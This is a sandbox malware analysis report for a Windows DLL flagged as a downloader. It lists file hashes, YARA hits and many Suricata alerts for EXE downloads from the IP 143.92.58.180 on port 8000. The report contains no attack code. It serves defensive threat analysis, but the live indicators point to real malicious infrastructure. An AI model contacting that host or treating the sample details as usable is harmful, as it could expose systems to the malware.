popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

d-8

Malicious Library Downloader PE32 DLL PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 18, 2023, 9:46 a.m. Oct. 18, 2023, 9:48 a.m.
Size 70.5KB
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 dc62653f9e2468f587b27fb7bb8857e2
SHA256 702ac05f0c523270a003e54c250535f52a6fcb5745089037a00b4d21926edca7
CRC32 3B2138BC
ssdeep 768:G407txg6CVX762AORxFGPRDEEOsx3n+79Namb3GluLrXCS32Ta1NzBoFsxHv5rMx:Gd7TGAgFqoQn+mmTCuL7NNzBl55rw3
Yara
  • Malicious_Library_Zero - Malicious_Library
  • Network_Downloader - File Downloader
  • PE_Header_Zero - PE File Signature
  • IsDLL - (no description)
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
143.92.58.180 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 143.92.58.180:8000 -> 192.168.56.103:49163 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49170 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49166 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49169 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49165 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49168 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49171 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49178 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49174 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49164 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49184 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49186 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49199 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49198 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49188 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49200 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49210 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49194 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49205 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49214 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49196 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49209 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49197 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49218 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49219 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49222 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49234 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49225 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49237 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49228 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49243 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49231 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49167 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49247 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49246 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49177 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49249 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49248 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49180 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49256 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49266 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49183 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49261 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49268 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49185 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49263 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49274 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49187 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49273 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49279 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49189 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49280 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49281 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49190 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49172 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49284 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49282 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49192 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49173 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49289 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49288 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49195 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49181 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49321 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49294 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49203 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49322 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49296 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49193 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49217 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49324 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49207 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49314 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49224 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49230 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49325 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49330 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49240 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49242 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49327 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49212 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49254 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49337 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49201 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49260 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49244 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49276 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49264 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49202 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49290 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49267 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49206 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49269 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49300 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49275 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49342 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49307 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49292 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49175 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49328 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49191 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49208 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49204 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49293 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49308 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49298 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49211 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49349 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49302 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49220 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49306 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49320 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49336 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49221 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49353 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49350 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49226 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49358 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49351 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49227 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49362 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49355 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49229 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49371 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49356 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49332 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49372 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49343 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49374 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49373 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49309 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49375 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49312 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49379 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49378 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49386 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49388 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49383 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49390 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49389 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49395 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49391 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49396 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49315 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49394 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49422 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49316 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49213 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49317 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49406 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49215 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49424 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49434 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49319 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49347 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49437 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49339 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49447 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49450 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49341 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49361 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49453 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49369 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49216 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49370 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49232 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49235 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49407 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49380 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49238 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49393 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49239 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49399 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49250 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49255 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49257 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49402 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49348 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49258 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49457 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49413 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49233 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49265 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49414 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49236 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49270 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49241 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49403 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49271 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49357 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49418 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49408 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49277 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49359 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49278 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49429 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49364 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49285 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49287 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49430 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
